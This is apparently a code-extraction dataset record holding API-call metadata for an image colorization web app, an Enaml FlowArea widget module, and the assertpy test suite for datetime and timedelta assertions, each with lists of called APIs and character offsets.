False, 'from pojo.User import User\n'), ((8747, 8756), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (8754, 8756), False, 'from dao.UserDAO import UserDAO\n'), ((9022, 9036), 'dao.FollowingDAO.FollowingDAO', 'FollowingDAO', ([], {}), '()\n', (9034, 9036), False, 'from dao.FollowingDAO import FollowingDAO\n'), ((9414, 9433), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (9427, 9433), False, 'from auth.Auth import Auth\n'), ((9583, 9589), 'pojo.User.User', 'User', ([], {}), '()\n', (9587, 9589), False, 'from pojo.User import User\n'), ((9640, 9649), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (9647, 9649), False, 'from dao.UserDAO import UserDAO\n'), ((10083, 10094), 'dao.FollowDAO.FollowDAO', 'FollowDAO', ([], {}), '()\n', (10092, 10094), False, 'from dao.FollowDAO import FollowDAO\n'), ((10708, 10727), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (10721, 10727), False, 'from auth.Auth import Auth\n'), ((10877, 10883), 'pojo.User.User', 'User', ([], {}), '()\n', (10881, 10883), False, 'from pojo.User import User\n'), ((10934, 10943), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (10941, 10943), False, 'from dao.UserDAO import UserDAO\n'), ((11208, 11221), 'dao.FollowerDAO.FollowerDAO', 'FollowerDAO', ([], {}), '()\n', (11219, 11221), False, 'from dao.FollowerDAO import FollowerDAO\n'), ((11500, 11540), 'random.randint', 'random.randint', (['(10000000000)', '(99999999999)'], {}), '(10000000000, 99999999999)\n', (11514, 11540), False, 'import random\n'), ((11690, 11709), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (11703, 11709), False, 'from auth.Auth import Auth\n'), ((11948, 11954), 'pojo.User.User', 'User', ([], {}), '()\n', (11952, 11954), False, 'from pojo.User import User\n'), ((12000, 12009), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (12007, 12009), False, 'from dao.UserDAO import UserDAO\n'), ((12469, 12478), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (12476, 12478), False, 'from dao.ImageDAO import WorkDAO\n'), ((13044, 13063), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (13057, 13063), False, 'from auth.Auth import Auth\n'), ((14867, 14886), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (14880, 14886), False, 'from auth.Auth import Auth\n'), ((15152, 15158), 'pojo.User.User', 'User', ([], {}), '()\n', (15156, 15158), False, 'from pojo.User import User\n'), ((15204, 15213), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (15211, 15213), False, 'from dao.UserDAO import UserDAO\n'), ((16307, 16326), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (16320, 16326), False, 'from auth.Auth import Auth\n'), ((16476, 16482), 'pojo.User.User', 'User', ([], {}), '()\n', (16480, 16482), False, 'from pojo.User import User\n'), ((16533, 16542), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (16540, 16542), False, 'from dao.UserDAO import UserDAO\n'), ((16959, 16968), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (16966, 16968), False, 'from dao.ImageDAO import WorkDAO\n'), ((17587, 17606), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (17600, 17606), False, 'from auth.Auth import Auth\n'), ((18197, 18206), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (18204, 18206), False, 'from dao.ImageDAO import WorkDAO\n'), ((19084, 19103), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (19097, 19103), False, 'from auth.Auth import Auth\n'), ((19253, 19259), 'pojo.User.User', 'User', ([], {}), '()\n', (19257, 19259), False, 'from pojo.User import User\n'), ((19310, 19319), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (19317, 19319), False, 'from dao.UserDAO import UserDAO\n'), ((19891, 19897), 'pojo.Image.Work', 'Work', ([], {}), '()\n', (19895, 19897), False, 'from pojo.Image import Work\n'), ((20835, 20844), 'pojo.address.Address', 'Address', ([], {}), '()\n', (20842, 20844), False, 'from pojo.address import Address\n'), ((20963, 20972), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (20970, 20972), False, 'from dao.ImageDAO import WorkDAO\n'), ((21210, 21253), 're.sub', 're.sub', (['"""^data:image/.+;base64,"""', '""""""', 'image'], {}), "('^data:image/.+;base64,', '', image)\n", (21216, 21253), False, 'import re\n'), ((21266, 21297), 'base64.urlsafe_b64decode', 'base64.urlsafe_b64decode', (['image'], {}), '(image)\n', (21290, 21297), False, 'import base64\n'), ((21310, 21346), 'numpy.fromstring', 'np.fromstring', (['image'], {'dtype': 'np.uint8'}), '(image, dtype=np.uint8)\n', (21323, 21346), True, 'import numpy as np\n'), ((21359, 21382), 'cv2.imdecode', 'cv2.imdecode', (['image', '(-1)'], {}), '(image, -1)\n', (21371, 21382), False, 'import cv2\n'), ((22379, 22428), 'cv2.cvtColor', 'cv2.cvtColor', (['improved_sketch', 'cv2.COLOR_BGR2GRAY'], {}), '(improved_sketch, cv2.COLOR_BGR2GRAY)\n', (22391, 22428), False, 'import cv2\n'), ((23488, 23513), 'cv2.imwrite', 'cv2.imwrite', (['path', 'result'], {}), '(path, result)\n', (23499, 23513), False, 'import cv2\n'), ((23682, 23701), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (23695, 23701), False, 'from auth.Auth import Auth\n'), ((23851, 23857), 'pojo.User.User', 'User', ([], {}), '()\n', (23855, 23857), False, 'from pojo.User import User\n'), ((23908, 23917), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (23915, 23917), False, 'from dao.UserDAO import UserDAO\n'), ((24960, 25000), 'cv2.imwrite', 'cv2.imwrite', (["(path + '/sketch.jpg')", 'image'], {}), "(path + '/sketch.jpg', image)\n", (24971, 25000), False, 'import cv2\n'), ((25016, 25025), 'pojo.address.Address', 'Address', ([], {}), '()\n', (25023, 25025), False, 'from pojo.address import Address\n'), ((25435, 25447), 'dao.addressDAO.AddressDAO', 'AddressDAO', ([], {}), '()\n', (25445, 25447), False, 'from dao.addressDAO import AddressDAO\n'), ((25869, 25888), 'auth.Auth.Auth.identify', 'Auth.identify', (['auth'], {}), '(auth)\n', (25882, 25888), False, 'from auth.Auth import Auth\n'), ((26147, 26156), 'pojo.address.Address', 'Address', ([], {}), '()\n', (26154, 26156), False, 'from pojo.address import Address\n'), ((26209, 26221), 'dao.addressDAO.AddressDAO', 'AddressDAO', ([], {}), '()\n', (26219, 26221), False, 'from dao.addressDAO import AddressDAO\n'), ((26415, 26435), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (26429, 26435), False, 'import os\n'), ((2235, 2244), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (2242, 2244), False, 'from dao.UserDAO import UserDAO\n'), ((5262, 5286), 'os.makedirs', 'os.makedirs', (['folder_path'], {}), '(folder_path)\n', (5273, 5286), False, 'import os\n'), ((13908, 13917), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (13915, 13917), False, 'from dao.ImageDAO import WorkDAO\n'), ((15539, 15548), 'dao.ImageDAO.WorkDAO', 'WorkDAO', ([], {}), '()\n', (15546, 15548), False, 'from dao.ImageDAO import WorkDAO\n'), ((25547, 25605), 'threading.Thread', 'threading.Thread', ([], {'target': 'handle_colorization', 'args': '(pool,)'}), '(target=handle_colorization, args=(pool,))\n', (25563, 25605), False, 'import threading\n'), ((1149, 1158), 'dao.UserDAO.UserDAO', 'UserDAO', ([], {}), '()\n', (1156, 1158), False, 'from dao.UserDAO import UserDAO\n'), ((3208, 3224), 'dao.InformationDAO.InformationDAO', 'InformationDAO', ([], {}), '()\n', (3222, 3224), False, 'from dao.InformationDAO import InformationDAO\n')]
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import (
Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default
)
from enaml.core.declarative import d_
from enaml.layout.geometry import Box
from .frame import Frame, ProxyFrame, Border
from .flow_item import FlowItem
class ProxyFlowArea(ProxyFrame):
""" The abstract definition of a proxy FlowArea object.
"""
#: A reference to the FlowArea declaration.
declaration = ForwardTyped(lambda: FlowArea)
def set_direction(self, direction):
raise NotImplementedError
def set_align(self, align):
raise NotImplementedError
def set_horizontal_spacing(self, spacing):
raise NotImplementedError
def set_vertical_spacing(self, spacing):
raise NotImplementedError
def set_margins(self, margins):
raise NotImplementedError
class FlowArea(Frame):
""" A widget which lays out its children in flowing manner, wrapping
around at the end of the available space.
"""
#: The flow direction of the layout.
direction = d_(Enum(
'left_to_right', 'right_to_left', 'top_to_bottom', 'bottom_to_top'
))
#: The alignment of a line of items within the layout.
align = d_(Enum('leading', 'trailing', 'center', 'justify'))
#: The amount of horizontal space to place between items.
horizontal_spacing = d_(Range(low=0, value=10))
#: The amount of vertical space to place between items.
vertical_spacing = d_(Range(low=0, value=10))
#: The margins to use around the outside of the flow area.
margins = d_(Coerced(Box, (10, 10, 10, 10)))
#: A FlowArea expands freely in width and height by default.
hug_width = set_default('ignore')
hug_height = set_default('ignore')
#: A reference to the ProxyFlowArea object.
proxy = Typed(ProxyFlowArea)
def flow_items(self):
""" Get the flow item children defined on this area.
"""
return [c for c in self.children if isinstance(c, FlowItem)]
#--------------------------------------------------------------------------
# Default Handlers
#--------------------------------------------------------------------------
def _default_border(self):
""" Get the default border for the flow area.
The default value matches the default for Qt's QScrollArea.
"""
return Border(style='styled_panel', line_style='sunken')
#--------------------------------------------------------------------------
# Observers
#--------------------------------------------------------------------------
@observe(('direction', 'align', 'horizontal_spacing', 'vertical_spacing',
'margins'))
def _update_proxy(self, change):
""" An observer which sends state change to the proxy.
"""
# The superclass handler implementation is sufficient.
super(FlowArea, self)._update_proxy(change)
|
[
"atom.api.Range",
"atom.api.Enum",
"atom.api.observe",
"atom.api.Typed",
"atom.api.ForwardTyped",
"atom.api.Coerced",
"atom.api.set_default"
] |
[((768, 799), 'atom.api.ForwardTyped', 'ForwardTyped', (['(lambda : FlowArea)'], {}), '(lambda : FlowArea)\n', (780, 799), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2021, 2042), 'atom.api.set_default', 'set_default', (['"""ignore"""'], {}), "('ignore')\n", (2032, 2042), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2060, 2081), 'atom.api.set_default', 'set_default', (['"""ignore"""'], {}), "('ignore')\n", (2071, 2081), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2143, 2163), 'atom.api.Typed', 'Typed', (['ProxyFlowArea'], {}), '(ProxyFlowArea)\n', (2148, 2163), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((2932, 3020), 'atom.api.observe', 'observe', (["('direction', 'align', 'horizontal_spacing', 'vertical_spacing', 'margins')"], {}), "(('direction', 'align', 'horizontal_spacing', 'vertical_spacing',\n 'margins'))\n", (2939, 3020), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1387, 1459), 'atom.api.Enum', 'Enum', (['"""left_to_right"""', '"""right_to_left"""', '"""top_to_bottom"""', '"""bottom_to_top"""'], {}), "('left_to_right', 'right_to_left', 'top_to_bottom', 'bottom_to_top')\n", (1391, 1459), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1550, 1598), 'atom.api.Enum', 'Enum', (['"""leading"""', '"""trailing"""', '"""center"""', '"""justify"""'], {}), "('leading', 'trailing', 'center', 'justify')\n", (1554, 1598), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1691, 1713), 'atom.api.Range', 'Range', ([], {'low': '(0)', 'value': '(10)'}), '(low=0, value=10)\n', (1696, 1713), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1802, 1824), 'atom.api.Range', 'Range', ([], {'low': '(0)', 'value': '(10)'}), '(low=0, value=10)\n', (1807, 1824), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n'), ((1907, 1937), 'atom.api.Coerced', 'Coerced', (['Box', '(10, 10, 10, 10)'], {}), '(Box, (10, 10, 10, 10))\n', (1914, 1937), False, 'from atom.api import Enum, Range, Coerced, Typed, ForwardTyped, observe, set_default\n')]
|
# Copyright (c) 2015-2019, Activision Publishing, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime
from assertpy import assert_that,fail
d1 = datetime.datetime.today()
def test_is_before():
d2 = datetime.datetime.today()
assert_that(d1).is_before(d2)
def test_is_before_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_before(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be before <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_before_bad_val_type_failure():
try:
assert_that(123).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_before_bad_arg_type_failure():
try:
assert_that(d1).is_before(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_after():
d2 = datetime.datetime.today()
assert_that(d2).is_after(d1)
def test_is_after_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_after(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be after <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_after_bad_val_type_failure():
try:
assert_that(123).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_after_bad_arg_type_failure():
try:
assert_that(d1).is_after(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds():
assert_that(d1).is_equal_to_ignoring_milliseconds(d1)
def test_is_equal_to_ignoring_milliseconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_milliseconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_milliseconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_milliseconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_milliseconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds():
assert_that(d1).is_equal_to_ignoring_seconds(d1)
def test_is_equal_to_ignoring_seconds_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_seconds(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}> to be equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}>, but was not.')
def test_is_equal_to_ignoring_seconds_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_seconds_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_seconds(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time():
assert_that(d1).is_equal_to_ignoring_time(d1)
def test_is_equal_to_ignoring_time_failure():
try:
d2 = datetime.datetime.today() + datetime.timedelta(days=1)
assert_that(d1).is_equal_to_ignoring_time(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2}> to be equal to <\d{4}-\d{2}-\d{2}>, but was not.')
def test_is_equal_to_ignoring_time_bad_val_type_failure():
try:
assert_that(123).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('val must be datetime, but was type <int>')
def test_is_equal_to_ignoring_time_bad_arg_type_failure():
try:
assert_that(d1).is_equal_to_ignoring_time(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was type <int>')
def test_is_greater_than():
d2 = datetime.datetime.today()
assert_that(d2).is_greater_than(d1)
def test_is_greater_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_greater_than_or_equal_to():
assert_that(d1).is_greater_than_or_equal_to(d1)
def test_is_greater_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_greater_than_or_equal_to(d2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be greater than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than():
d2 = datetime.datetime.today()
assert_that(d1).is_less_than(d2)
def test_is_less_than_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_bad_arg_type_failure():
try:
assert_that(d1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_less_than_or_equal_to():
assert_that(d1).is_less_than_or_equal_to(d1)
def test_is_less_than_or_equal_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d2).is_less_than_or_equal_to(d1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be less than or equal to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_bad_arg_type_failure():
try:
assert_that(d1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <datetime>, but was <int>')
def test_is_between():
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d2).is_between(d1, d3)
def test_is_between_failure():
try:
d2 = datetime.datetime.today()
d3 = datetime.datetime.today()
assert_that(d1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was not.')
def test_is_between_bad_arg1_type_failure():
try:
assert_that(d1).is_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_not_between():
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d1).is_not_between(d2, d3)
def test_is_not_between_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
d3 = d1 + datetime.timedelta(minutes=10)
assert_that(d2).is_not_between(d1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be between <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> and <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}>, but was.')
def test_is_not_between_bad_arg1_type_failure():
try:
assert_that(d1).is_not_between(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given low arg must be <datetime>, but was <int>')
def test_is_not_between_bad_arg2_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_between(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given high arg must be <datetime>, but was <datetime>')
def test_is_close_to():
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=5))
def test_is_close_to_failure():
try:
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_close_to(d2, datetime.timedelta(minutes=1))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was not.')
def test_is_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
def test_is_not_close_to():
d2 = d1 + datetime.timedelta(minutes=5)
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=4))
def test_is_not_close_to_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, datetime.timedelta(minutes=5))
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> to not be close to <\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}> within tolerance <\d+:\d{2}:\d{2}>, but was.')
def test_is_not_close_to_bad_arg_type_failure():
try:
assert_that(d1).is_not_close_to(123, 456)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be datetime, but was <int>')
def test_is_not_close_to_bad_tolerance_arg_type_failure():
try:
d2 = datetime.datetime.today()
assert_that(d1).is_not_close_to(d2, 123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given tolerance arg must be timedelta, but was <int>')
t1 = datetime.timedelta(seconds=60)
def test_is_greater_than_timedelta():
d2 = datetime.timedelta(seconds=120)
assert_that(d2).is_greater_than(t1)
def test_is_greater_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_greater_than_or_equal_to_timedelta():
assert_that(t1).is_greater_than_or_equal_to(t1)
def test_is_greater_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_greater_than_or_equal_to(t2)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be greater than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_greater_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_greater_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_timedelta():
t2 = datetime.timedelta(seconds=90)
assert_that(t1).is_less_than(t2)
def test_is_less_than_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_less_than_or_equal_to_timedelta():
assert_that(t1).is_less_than_or_equal_to(t1)
def test_is_less_than_or_equal_to_timedelta_failure():
try:
t2 = datetime.timedelta(seconds=90)
assert_that(t2).is_less_than_or_equal_to(t1)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be less than or equal to <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_less_than_or_equal_to_timedelta_bad_arg_type_failure():
try:
assert_that(t1).is_less_than_or_equal_to(123)
fail('should have raised error')
except TypeError as ex:
assert_that(str(ex)).is_equal_to('given arg must be <timedelta>, but was <int>')
def test_is_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_between(t1, d3)
def test_is_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=30)
d3 = datetime.timedelta(seconds=40)
assert_that(t1).is_between(d2, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was not.')
def test_is_not_between_timedelta():
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(t1).is_not_between(d2, d3)
def test_is_not_between_timedelta_failure():
try:
d2 = datetime.timedelta(seconds=90)
d3 = datetime.timedelta(seconds=120)
assert_that(d2).is_not_between(t1, d3)
fail('should have raised error')
except AssertionError as ex:
assert_that(str(ex)).matches(r'Expected <\d{1,2}:\d{2}:\d{2}> to not be between <\d{1,2}:\d{2}:\d{2}> and <\d{1,2}:\d{2}:\d{2}>, but was.')
|
[
"assertpy.assert_that",
"datetime.timedelta",
"datetime.datetime.today",
"assertpy.fail"
] |
